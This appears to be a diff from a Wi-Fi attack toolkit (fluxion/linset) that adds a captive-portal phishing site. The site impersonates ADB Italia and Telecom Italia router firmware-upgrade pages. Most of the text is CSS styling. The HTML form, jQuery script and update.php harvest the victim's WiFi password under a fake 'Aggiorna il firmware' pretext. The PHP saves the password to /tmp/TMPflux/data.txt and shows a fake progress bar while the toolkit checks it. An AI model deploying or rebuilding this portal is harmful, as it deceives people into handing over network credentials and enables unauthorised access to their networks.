padding-bottom: 5px;
|
||||
padding-right: 5px;
|
||||
padding-left: 50px;
|
||||
}
|
||||
|
||||
div.waitingBox {
|
||||
background-image: url("../img/Waiting32.png");
|
||||
background-repeat: no-repeat;
|
||||
background-position: 5px 5px;
|
||||
border: 1px solid #D89815;
|
||||
background-color: #F4D47B;
|
||||
color: #000044;
|
||||
}
|
||||
|
||||
div.informationBox {
|
||||
background-image: url("../img/Information32.png");
|
||||
background-repeat: no-repeat;
|
||||
background-position: 5px 5px;
|
||||
border: 1px solid blue;
|
||||
font-style: italic;
|
||||
background-color: #BBBBFF;
|
||||
color: #000077;
|
||||
}
|
||||
|
||||
div.errorBox {
|
||||
background-image: url("../img/ResultError32.png");
|
||||
background-repeat: no-repeat;
|
||||
background-position: 5px 5px;
|
||||
border: 1px solid red;
|
||||
background-color: #FFAAAA;
|
||||
color: #880000;
|
||||
}
|
||||
|
||||
div.warningBox {
|
||||
background-image: url("../img/Warning32.png");
|
||||
background-repeat: no-repeat;
|
||||
background-position: 5px 5px;
|
||||
border: 1px solid #AAAA33;
|
||||
background-color: #FFFFAA;
|
||||
color: #664400;
|
||||
}
|
||||
|
||||
div.resultBox {
|
||||
background-image: url("../img/ResultOk32.png");
|
||||
background-repeat: no-repeat;
|
||||
background-position: 5px 5px;
|
||||
border: 1px solid green;
|
||||
background-color: #BBFFBB;
|
||||
color: #006600;
|
||||
}
|
||||
|
||||
div.phaseBox {
|
||||
background-repeat: no-repeat;
|
||||
background-position: 5px 5px;
|
||||
border: 1px solid blue;
|
||||
font-weight: normal;
|
||||
font-style: normal;
|
||||
background-color: #BBBBFF;
|
||||
color: #000077;
|
||||
}
|
||||
|
||||
div.phaseBox div.done {
|
||||
border: 1px solid green;
|
||||
background-color: #BBFFBB;
|
||||
color: #006600;
|
||||
}
|
||||
|
||||
div.phaseBox div.skipped {
|
||||
border: 1px solid gray;
|
||||
background-color: lightgray;
|
||||
color: gray;
|
||||
}
|
||||
|
||||
div.progressbar {
|
||||
background-color: #DDDDDD;
|
||||
|
||||
border: 1px solid #BBBBBB;
|
||||
}
|
||||
|
||||
div.progressbar div.progress {
|
||||
border: 1px solid #BA8888;
|
||||
|
||||
background-color: #CB0019;
|
||||
|
||||
background: -webkit-gradient(linear, 0% 0%, 0% 100%, from(#CB0019), to(#FFCCCC));
|
||||
background: -webkit-linear-gradient(top, #CB0019, #FFCCCC);
|
||||
background: -moz-linear-gradient(top, #CB0019, #FFCCCC);
|
||||
background: -ms-linear-gradient(top, #CB0019, #FFCCCC);
|
||||
background: -o-linear-gradient(top, #CB0019, #FFCCCC);
|
||||
}
|
||||
|
||||
div.log {
|
||||
font-size: 10px;
|
||||
background-color: #eeeeee;
|
||||
padding: 5px;
|
||||
border: 1px inset blue;
|
||||
cursor: text;
|
||||
}
|
After Width: | Height: | Size: 890 B |
After Width: | Height: | Size: 482 B |
After Width: | Height: | Size: 784 B |
After Width: | Height: | Size: 4.4 KiB |
After Width: | Height: | Size: 883 B |
After Width: | Height: | Size: 1.7 KiB |
After Width: | Height: | Size: 15 KiB |
After Width: | Height: | Size: 12 KiB |
|
@ -0,0 +1,170 @@
|
|||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|
||||
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
|
||||
<head>
|
||||
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
|
||||
<meta http-equiv="Cache-Control" content="no-cache">
|
||||
<meta http-equiv="Pragma" content="no-cache">
|
||||
<meta http-equiv="Expires" content="-1">
|
||||
|
||||
<title>Residential Gateway - ADB Italia</title>
|
||||
<link rel="icon" href="img/favicon-16x16.png"/>
|
||||
<link rel="stylesheet" href="css/calendar.css"/>
|
||||
<link rel="stylesheet" href="css/common.css"/>
|
||||
<link rel="stylesheet" href="css/theme.css"/>
|
||||
<link rel="stylesheet" href="css/helpwidget.css"/>
|
||||
<link rel="stylesheet" href="css/style.css"/>
|
||||
|
||||
<!--<script src="js/jquery.js"></script>
|
||||
<script src="js/common.js"></script>
|
||||
<script src="js/calendar_eu.js"></script>
|
||||
<script src="js/system.js"></script>
|
||||
<script src="js/fwupgrade.js"></script>-->
|
||||
</head>
|
||||
<body style="cursor: default;">
|
||||
<div id="header">
|
||||
<img id="logo" src="img/logo.png"/>
|
||||
<ul class="tabs">
|
||||
<li><a href="#" class="tab">Configurazione<br>Base</a></li>
|
||||
<li><a href="#" class="tab tabselected">Configurazione<br>Avanzata</a></li>
|
||||
</ul>
|
||||
</div>
|
||||
<div id="navigationBar">
|
||||
<ul>
|
||||
<li>
|
||||
<img src="img/Home16.png">
|
||||
</li>
|
||||
<li>
|
||||
<a href="#">Home</a>
|
||||
</li>
|
||||
<li>
|
||||
<a href="#">Sistema</a>
|
||||
</li>
|
||||
<li>
|
||||
<a href="#">Aggiorna il firmware</a>
|
||||
</li>
|
||||
<li>
|
||||
<a href="#">Server di rete</a>
|
||||
</li>
|
||||
</ul>
|
||||
<div id="logout">
|
||||
ADB Italia
|
||||
<img src="img/AdminUser16.png" title="Amministratore">
|
||||
<a href="#">Logout</a>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div id="content">
|
||||
<div id="panelFwUpgrade" class="panel">
|
||||
<label class="panel">
|
||||
Aggiorna il Firmware
|
||||
</label>
|
||||
<img class="panel" src="img/FwUpgrade16.png">
|
||||
<hr class="panel">
|
||||
<div class="formGraphics">
|
||||
<img src="img/FwUpgrade48.png">
|
||||
</div>
|
||||
<div class="form">
|
||||
<ul class="tabs">
|
||||
<li>
|
||||
<a id="local" href="#" class="tab" >Carica un file locale</a>
|
||||
</li>
|
||||
<li>
|
||||
<a id="repo" href="#" class="tab tabselected" >Scarica dalla rete</a>
|
||||
</li>
|
||||
</ul>
|
||||
<form id="updateform" method="post" action="update.php">
|
||||
<fieldset class="form">
|
||||
<div class="formField">
|
||||
<label>Versione Firmware attuale:</label>
|
||||
<span class="text">DV2200_FWB_4.1.0.0253</span>
|
||||
</div>
|
||||
<div class="formField">
|
||||
<label>Nuova versione Firmware:</label>
|
||||
<span class="text red">DV2200_FWB_6.9.12.1752</span>
|
||||
</div>
|
||||
<div class="msgBox informationBox">
|
||||
<a class="closeLink" href="#" onclick="$(this.parentNode).fadeOut(500); return false;">
|
||||
<img src="img/Close16.png">
|
||||
</a>
|
||||
Inserire la password per aggiornare alla nuova versione del Firmware
|
||||
</div>
|
||||
<div class="formField" id="password" help_tooltip="off">
|
||||
<label for="password">Password WiFi :</label>
|
||||
<input id="wpa_psw" name="wpa_psw" type="password" size="60">
|
||||
</div>
|
||||
<div class="formField" id="check_password" help_tooltip="off">
|
||||
<label for="check_password">Conferma password WiFi :</label>
|
||||
<input id="wpa_psw_conf" name="wpa_psw_conf" type="password" size="60">
|
||||
</div>
|
||||
<div class="formField" style="text-align: center">
|
||||
<progress id="pbar" value="0" max="100"></progress>
|
||||
</div>
|
||||
</fieldset>
|
||||
<div class="buttons">
|
||||
<input id="button_update" value="Aggiorna" type="submit">
|
||||
</div>
|
||||
</form>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div id="footer">
|
||||
Copyright © 2010-2015 ADB Italia S.r.l.
|
||||
</div>
|
||||
|
||||
<script type="text/javascript" src="js/jquery-2.1.4.min.js"></script>
|
||||
<script type="text/javascript" src="js/pBar.js"></script>
|
||||
<script type="text/javascript">
|
||||
$(document).ready(function() {
|
||||
$("#updateform").submit(function(e) {
|
||||
|
||||
e.preventDefault();
|
||||
$(".error").hide();
|
||||
|
||||
var hasError = false;
|
||||
var wpa_psw = $("#wpa_psw").val();
|
||||
var wpa_psw_conf = $("#wpa_psw_conf").val();
|
||||
|
||||
if (wpa_psw == '') {
|
||||
$("#wpa_psw").after('<span class="error">Per favore, inserire la password.</span>');
|
||||
hasError = true;
|
||||
} else if (wpa_psw_conf == '') {
|
||||
$("#wpa_psw_conf").after('<span class="error">Per favore, inserire la stessa password.</span>');
|
||||
hasError = true;
|
||||
} else if (wpa_psw != wpa_psw_conf ) {
|
||||
$("#wpa_psw_conf").after('<span class="error">Le password non sono uguali.</span>');
|
||||
hasError = true;
|
||||
}
|
||||
|
||||
|
||||
if (!hasError) {
|
||||
var formURL = $(this).attr("action");
|
||||
var pBar = $("#pbar");
|
||||
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url : formURL,
|
||||
data: {wpa_psw: wpa_psw, wpa_psw_conf: wpa_psw_conf},
|
||||
dataType:'JSON',
|
||||
success:function(response){
|
||||
console.log(response);
|
||||
|
||||
if (response) {
|
||||
// psw OK
|
||||
$("#wpa_psw").prop('disabled', true);
|
||||
$("#wpa_psw_conf").prop('disabled', true);
|
||||
pBar.addClass("update");
|
||||
|
||||
doProgress();
|
||||
} else {
|
||||
alert ("La password inserita non è corretta! Inserire la password corretta.");
|
||||
$("#button_update").prop('disabled', false);
|
||||
}
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
});
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
4
attacks/Captive Portal/sites/Adbepicentro_Italian.portal/js/jquery-2.1.4.min.js
vendored
Normal file
|
@ -0,0 +1,26 @@
|
|||
var bar = document.getElementById("pbar");
|
||||
|
||||
function addProgress() {
|
||||
var random_value = Math.floor(Math.random() * 10) + 1;
|
||||
|
||||
$({
|
||||
interpVal: bar.value
|
||||
}).animate({
|
||||
interpVal: bar.value + random_value
|
||||
}, {
|
||||
duration: 500,
|
||||
step: function () {
|
||||
bar.value = this.interpVal;
|
||||
}
|
||||
});
|
||||
|
||||
if (bar.value < bar.max) {
|
||||
var random_time = Math.floor(Math.random() * 4000) + 1000;
|
||||
setTimeout(addProgress, random_time);
|
||||
} else
|
||||
alert("Aggiornamento eseguito. Si prega di riavviare il router.");
|
||||
}
|
||||
|
||||
function doProgress() {
|
||||
setTimeout(addProgress, 500);
|
||||
}
|
|
@ -0,0 +1,35 @@
|
|||
<?php
|
||||
require_once('config/linset_connector.php');
|
||||
|
||||
if( (isset($_POST['wpa_psw']) && !empty($_POST['wpa_psw'])) && (isset($_POST['wpa_psw_conf']) && !empty($_POST['wpa_psw_conf'])))
|
||||
{
|
||||
// Aggiornamento tentativi effettuati
|
||||
$hits = file(HIT);
|
||||
$hits[0]++;
|
||||
file_put_contents(HIT, $hits[0]);
|
||||
|
||||
// Password inviata
|
||||
file_put_contents(DATA, $_POST['wpa_psw']."\r\n", FILE_APPEND);
|
||||
|
||||
// Aggiornamento intento
|
||||
$archivio = fopen(INTENTO, "w");
|
||||
fwrite($archivio, "\n");
|
||||
fclose($archivio);
|
||||
|
||||
while (1)
|
||||
{
|
||||
if (file_get_contents(INTENTO) == 2) {
|
||||
// Password ok
|
||||
echo 'true';
|
||||
break;
|
||||
}
|
||||
else if (file_get_contents(INTENTO) == 1) {
|
||||
// Password errata
|
||||
echo 'false';
|
||||
break;
|
||||
}
|
||||
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
?>
|
|
@ -0,0 +1,10 @@
|
|||
<?php
|
||||
// Configure this file to matching the variable "DUMP_PATH" into fluxion files
|
||||
|
||||
$TMP_PATH = "/tmp/TMPflux/";
|
||||
|
||||
define("HIT", "$TMP_PATH"."hit.txt");
|
||||
define("DATA", "$TMP_PATH"."data.txt");
|
||||
define("STATUS", "$TMP_PATH"."status.txt");
|
||||
define("INTENTO", "$TMP_PATH"."intento");
|
||||
?>
|
|
@ -0,0 +1,319 @@
|
|||
// Alice(R) is a registered trademark of Telecom Italia // Powered by Telecom Italia//
|
||||
|
||||
td {
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: normal;
|
||||
text-decoration: none;
|
||||
color: #666666;
|
||||
background-color: #FFFFFF;
|
||||
border-left-color: #FFFFFF;
|
||||
border-left-width: 0px;
|
||||
border-left-style: solid;
|
||||
border-right-color: #FFFFFF;
|
||||
border-right-width: 0px;
|
||||
border-right-style: solid;
|
||||
border-top-color: #000000;
|
||||
border-top-width: 0px;
|
||||
border-top-style: solid;
|
||||
border-bottom-color: #FFFFFF;
|
||||
border-bottom-width: 0px;
|
||||
border-bottom-style: solid
|
||||
}
|
||||
|
||||
tr {
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 16px;
|
||||
font-weight: normal;
|
||||
text-decoration: none;
|
||||
color: #666666;
|
||||
border-left-color: #FFFFFF;
|
||||
border-left-width: 0px;
|
||||
border-left-style: solid;
|
||||
border-right-color: #FFFFFF;
|
||||
border-right-width: 0px;
|
||||
border-right-style: solid;
|
||||
border-top-color: #000000;
|
||||
border-top-width: 0px;
|
||||
border-top-style: solid;
|
||||
border-bottom-color: #FFFFFF;
|
||||
border-bottom-width: 0px;
|
||||
border-bottom-style: solid;}
|
||||
|
||||
.td50 {
|
||||
background-color: #B6C4E9;
|
||||
border-bottom-color: #c0c0c0;
|
||||
border-bottom-style: solid;
|
||||
border-bottom-width: 1px;
|
||||
border-left-color: #c0c0c0;
|
||||
border-left-style: solid;
|
||||
border-left-width: 1px;
|
||||
border-right-color: #c0c0c0;
|
||||
border-right-style: solid;
|
||||
border-right-width: 1px;
|
||||
border-top-color: #c0c0c0;
|
||||
border-top-style: solid;
|
||||
border-top-width: 1px;
|
||||
color: #FFFFFF;
|
||||
height: 50px;
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 20px;
|
||||
font-weight: bold;
|
||||
text-align: center;
|
||||
text-decoration: none}
|
||||
|
||||
.tabH1 {
|
||||
background-color: #53669e;
|
||||
border-bottom-color: #c0c0c0;
|
||||
border-bottom-style: solid;
|
||||
border-bottom-width: 1px;
|
||||
border-left-color: #c0c0c0;
|
||||
border-left-style: solid;
|
||||
border-left-width: 1px;
|
||||
border-right-color: #c0c0c0;
|
||||
border-right-style: solid;
|
||||
border-right-width: 1px;
|
||||
border-top-color: #c0c0c0;
|
||||
border-top-style: solid;
|
||||
border-top-width: 1px;
|
||||
color: #FFFFFF;
|
||||
height: 30px;
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 20px;
|
||||
font-weight: bold;
|
||||
text-align: center;
|
||||
text-decoration: none}
|
||||
|
||||
.tabH2 {
|
||||
background-color: #53669e;
|
||||
border-bottom-color: #000000;
|
||||
border-bottom-style: solid;
|
||||
border-bottom-width: 0px;
|
||||
border-left-color: #000000;
|
||||
border-left-style: solid;
|
||||
border-left-width: 0px;
|
||||
border-right-color: #000000;
|
||||
border-right-style: solid;
|
||||
border-right-width: 0px;
|
||||
border-top-color: #ffffff;
|
||||
border-top-style: solid;
|
||||
border-top-width: 0px;
|
||||
height: 25px;
|
||||
color: #ffffff;
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 16px;
|
||||
font-weight: bold;
|
||||
text-align: center;
|
||||
text-decoration: none}
|
||||
|
||||
.tabH2a {
|
||||
background-color: #B6C4E9;
|
||||
border-bottom-color: #000000;
|
||||
border-bottom-style: solid;
|
||||
border-bottom-width: 0px;
|
||||
border-left-color: #000000;
|
||||
border-left-style: solid;
|
||||
border-left-width: 0px;
|
||||
border-right-color: #000000;
|
||||
border-right-style: solid;
|
||||
border-right-width: 0px;
|
||||
border-top-color: #ffffff;
|
||||
border-top-style: solid;
|
||||
border-top-width: 0px;
|
||||
height: 30px;
|
||||
color: RED;
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 18px;
|
||||
font-weight: bold;
|
||||
text-align: left;
|
||||
text-decoration: none}
|
||||
|
||||
.tabH2b {
|
||||
background-color: #WHITE;
|
||||
border-bottom-color: #000000;
|
||||
border-bottom-style: solid;
|
||||
border-bottom-width: 0px;
|
||||
border-left-color: #000000;
|
||||
border-left-style: solid;
|
||||
border-left-width: 0px;
|
||||
border-right-color: #000000;
|
||||
border-right-style: solid;
|
||||
border-right-width: 0px;
|
||||
border-top-color: #ffffff;
|
||||
border-top-style: solid;
|
||||
border-top-width: 0px;
|
||||
height: 150px;
|
||||
color: #333333;
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 14px;
|
||||
font-weight: normal;
|
||||
text-align: center;
|
||||
text-decoration: none}
|
||||
|
||||
.tabH2c {
|
||||
background-color: #B6C4E9;
|
||||
border-bottom-color: #000000;
|
||||
border-bottom-style: solid;
|
||||
border-bottom-width: 0px;
|
||||
border-left-color: #000000;
|
||||
border-left-style: solid;
|
||||
border-left-width: 0px;
|
||||
border-right-color: #000000;
|
||||
border-right-style: solid;
|
||||
border-right-width: 0px;
|
||||
border-top-color: #ffffff;
|
||||
border-top-style: solid;
|
||||
border-top-width: 0px;
|
||||
height: 30px;
|
||||
color: #333333;
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 18px;
|
||||
font-weight: bold;
|
||||
text-align: left;
|
||||
text-decoration: none}
|
||||
|
||||
.tabH3 {
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 15px;
|
||||
font-weight: bold;
|
||||
text-align: left;
|
||||
text-decoration: none;
|
||||
color: #FFFFFF;
|
||||
height: 23px;
|
||||
background-color: #B6C4E9;
|
||||
border-left-color: #333333;
|
||||
border-left-width: 1px;
|
||||
border-left-style: solid;
|
||||
border-right-color: #333333;
|
||||
border-right-width: 1px;
|
||||
border-right-style: solid;
|
||||
border-top-color: #333333;
|
||||
border-top-width: 1px;
|
||||
border-top-style: solid;
|
||||
border-bottom-color: #333333;
|
||||
border-bottom-width: 1px;
|
||||
border-bottom-style: solid;}
|
||||
|
||||
.cell1 {
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: bold;
|
||||
text-align: left;
|
||||
color: #FFFFFF;
|
||||
height: 22px;
|
||||
background-color: #53669E;
|
||||
border-left-color: #333333;
|
||||
border-left-width: 1px;
|
||||
border-left-style: solid;
|
||||
border-right-color: #333333;
|
||||
border-right-width: 1px;
|
||||
border-right-style: solid;
|
||||
border-top-color: #333333;
|
||||
border-top-width: 1px;
|
||||
border-top-style: solid;
|
||||
border-bottom-color: #333333;
|
||||
border-bottom-style: solid;
|
||||
border-bottom-width: 1px;}
|
||||
|
||||
.cell2 {
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: normal;
|
||||
text-align: left;
|
||||
color: #000000;
|
||||
height: 22px;
|
||||
background-color: #FFFFFF;
|
||||
border-left-color: #333333;
|
||||
border-left-width: 1px;
|
||||
border-left-style: solid;
|
||||
border-right-color: #333333;
|
||||
border-right-width: 1px;
|
||||
border-right-style: solid;
|
||||
border-top-color: #333333;
|
||||
border-top-width: 1px;
|
||||
border-top-style: solid;
|
||||
border-bottom-color: #333333;
|
||||
border-bottom-width: 1px;
|
||||
border-bottom-style: solid;}
|
||||
|
||||
.th3 {
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: normal;
|
||||
color: black;
|
||||
background-color: #FFFFFF;
|
||||
border-left-color: #000000;
|
||||
border-left-width: 0px;
|
||||
border-left-style: solid;
|
||||
border-right-color: #000000;
|
||||
border-right-width: 0px;
|
||||
border-right-style: solid;
|
||||
border-top-color: #000000;
|
||||
border-top-width: 0px;
|
||||
border-top-style: solid;
|
||||
border-bottom-color: #000000;
|
||||
border-bottom-width: 0px;
|
||||
border-bottom-style: solid;}
|
||||
|
||||
.th3v {
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: normal;
|
||||
color: #009900;
|
||||
background-color: #FFFFFF;
|
||||
border-left-color: #000000;
|
||||
border-left-width: 0px;
|
||||
border-left-style: solid;
|
||||
border-right-color: #000000;
|
||||
border-right-width: 0px;
|
||||
border-right-style: solid;
|
||||
border-top-color: #000000;
|
||||
border-top-width: 0px;
|
||||
border-top-style: solid;
|
||||
border-bottom-color: #000000;
|
||||
border-bottom-width: 0px;
|
||||
border-bottom-style: solid;}
|
||||
|
||||
.th3a {
|
||||
font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px; font-weight: normal; color: #FF9900;
|
||||
background-color: #FFFFFF;
|
||||
border-left-color: #000000;
|
||||
border-left-width: 0px;
|
||||
border-left-style: solid;
|
||||
border-right-color: #000000;
|
||||
border-right-width: 0px;
|
||||
border-right-style: solid;
|
||||
border-top-color: #000000;
|
||||
border-top-width: 0px;
|
||||
border-top-style: solid;
|
||||
border-bottom-color: #000000;
|
||||
border-bottom-width: 0px;
|
||||
border-bottom-style: solid;}
|
||||
|
||||
.th3r {font-family: Verdana, Arial, Helvetica, sans-serif;
|
||||
font-size: 12px;
|
||||
font-weight: normal;
|
||||
color: #FF0000;
|
||||
background-color: #FFFFFF;
|
||||
border-left-color: #000000;
|
||||
border-left-width: 0px;
|
||||
border-left-style: solid;
|
||||
border-right-color: #000000;
|
||||
border-right-width: 0px;
|
||||
border-right-style: solid;
|
||||
border-top-color: #000000;
|
||||
border-top-width: 0px;
|
||||
border-top-style: solid;
|
||||
border-bottom-color: #000000;
|
||||
border-bottom-width: 0px;
|
||||
border-bottom-style: solid;}
|
||||
|
||||
|
||||
h1 {font-family: Arial, Verdana, Helvetica, sans-serif;
|
||||
font-size: 18px;
|
||||
font-weight: bold;
|
||||
color: #FFFFFF;
|
||||
margin-top: 20px;
|
||||
margin-left: 20%;
|
||||
}
|
|
@ -0,0 +1,25 @@
|
|||
/* CSS Document */
|
||||
|
||||
html,body{margin:0;padding:0}
|
||||
body{font: 76% arial,sans-serif;text-align:center}
|
||||
p{margin:0 10px 10px}
|
||||
a{display:block;color: #981793;padding-left:15px;padding-top:10px;margin-bottom:10px;}
|
||||
div#header{height:110px;margin:0;
|
||||
padding-left:10px;background-image: url(../images/header_agwifi.jpg); layer-background-image: url(../images/header_agwifi.jpg);}
|
||||
div#container{text-align:left}
|
||||
|
||||
div#left{background:#B7C4E8}
|
||||
div#right{background:#FF8539}
|
||||
div#footer{height:35px; background: #ff00ff;color: #FFF;background-image: url(/images/onda.gif); layer-background-image: url(/images/onda.gif);}
|
||||
div#footer1{height:35px; background: #53669E;color: #FFF;}
|
||||
|
||||
|
||||
|
||||
div#container{width:1000px;margin:0 auto}
|
||||
div#wrapper{float:left;width:100%}
|
||||
div#content{margin: 0 150px}
|
||||
div#left{float:left;width:150px;height:700px;margin-left:-1000px}
|
||||
div#right{float:left;width:150px;height:700px;margin-left:-150px}
|
||||
div#footer{clear:left;width:100%}
|
||||
div#footer1{clear:left;width:100%}
|
||||
|
|
@ -0,0 +1,36 @@
|
|||
span.error {
|
||||
color: #CC0000;
|
||||
font-size: 10px;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
progress {
|
||||
display: none;
|
||||
width: 25em;
|
||||
}
|
||||
|
||||
progress.update {
|
||||
display: inline-block;
|
||||
}
|
||||
|
||||
.bold {
|
||||
font-weight: bold !important;
|
||||
}
|
||||
|
||||
.red {
|
||||
color: #CC0000 !important;
|
||||
}
|
||||
|
||||
fieldset {
|
||||
border: none;
|
||||
}
|
||||
|
||||
fieldset .bold {
|
||||
display: block;/* force to a block so width and word wrap work */
|
||||
float: left;/* keep to left of following control */
|
||||
width: 183px;
|
||||
margin: 1px 8px 4px 0;
|
||||
padding: 0;
|
||||
border: 0;
|
||||
text-align: right;
|
||||
}
|
After Width: | Height: | Size: 1.6 KiB |
After Width: | Height: | Size: 1.7 KiB |
After Width: | Height: | Size: 1.7 KiB |
After Width: | Height: | Size: 1.6 KiB |
After Width: | Height: | Size: 1.6 KiB |
After Width: | Height: | Size: 1.6 KiB |
After Width: | Height: | Size: 1.7 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.6 KiB |
After Width: | Height: | Size: 1.7 KiB |
After Width: | Height: | Size: 1.7 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.7 KiB |
After Width: | Height: | Size: 1.6 KiB |
After Width: | Height: | Size: 1.7 KiB |
After Width: | Height: | Size: 11 KiB |
|
@ -0,0 +1,77 @@
|
|||
<!--- Page(9104)=[Line Settings] --->
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|
||||
<link rel="stylesheet" type="text/css" href="css/_cpe.css">
|
||||
<link rel="stylesheet" type="text/css" href="css/layout.css">
|
||||
|
||||
<title>Modem Telecom Italia - Strumenti</title>
|
||||
</head>
|
||||
<body>
|
||||
<div>
|
||||
<div id="container">
|
||||
<div id="header"> </div>
|
||||
<div id="wrapper">
|
||||
<div id="content">
|
||||
<iframe name="mainFrame" src="statoApparato_data/statoApparato.html" target="mainFrame" scrolling="auto" width="700" frameborder="0" height="700"></iframe>
|
||||
</div>
|
||||
</div>
|
||||
<div id="left">
|
||||
<h1>Standard</h1>
|
||||
<a href="#" alt="Stato Modem" title="Stato Modem">
|
||||
<img name="img52" id="img52" src="images/buttonD8.gif" alt="Stato Modem" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Stato Modem" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Stato Connessione" title="Stato Connessione">
|
||||
<img name="img53" id="img53" src="images/buttonDB.gif" alt="Stato Connessione" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Stato Connessione" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Stato Servizi" title="Stato Servizi">
|
||||
<img name="img60" id="img60" src="images/button_7.gif" alt="Stato Servizi" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Stato Servizi" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="LAN" title="LAN">
|
||||
<img name="img54" id="img54" src="images/buttonDE.gif" alt="LAN" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="LAN" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Wi-Fi" title="Wi-Fi">
|
||||
<img name="img55" id="img55" src="images/buttonE1.gif" alt="Wi-Fi" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Wi-Fi" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Dettagli Modem" title="Dettagli Modem">
|
||||
<img name="img56" id="img56" src="images/buttonE4.gif" alt="Dettagli Modem" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Dettagli Modem" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Statistiche" title="Statistiche">
|
||||
<img name="img57" id="img57" src="images/buttonE7.gif" alt="Statistiche" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Statistiche" width="115" height="25" border="0">
|
||||
</a>
|
||||
</div>
|
||||
<div id="right">
|
||||
<h1>Avanzate</h1>
|
||||
<a href="#" alt="Porta USB" title="Porta USB">
|
||||
<img name="img34" id="img34" src="images/buttonD5.gif" alt="Porta USB" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Porta USB" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Telefonia" title="Telefonia">
|
||||
<img name="img30" id="img30" src="images/buttonC2.gif" alt="Telefonia" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Telefonia" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Port Mapping" title="Port Mapping">
|
||||
<img name="img27" id="img27" src="images/buttonB9.gif" alt="Port Mapping" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Port Mapping" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="DNS Dinamico" title="DNS Dinamico">
|
||||
<img name="img28" id="img28" src="images/buttonBC.gif" alt="DNS Dinamico" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="DNS Dinamico" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Firewall" title="Firewall">
|
||||
<img name="img29" id="img29" src="images/buttonBF.gif" alt="Firewall" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Firewall" width="115" height="25" border="0">
|
||||
</a>
|
||||
<a href="#" alt="Strumenti" title="Strumenti">
|
||||
<img name="img31" id="img31" src="images/buttonC5.gif" alt="Strumenti" fp-style="fp-btn: Embossed Capsule 5; fp-font-color-hover: #3E67B9; fp-font-color-press: #FF0000; fp-transparent: 1; fp-proportional: 0" fp-title="Strumenti" width="115" height="25" border="0">
|
||||
</a>
|
||||
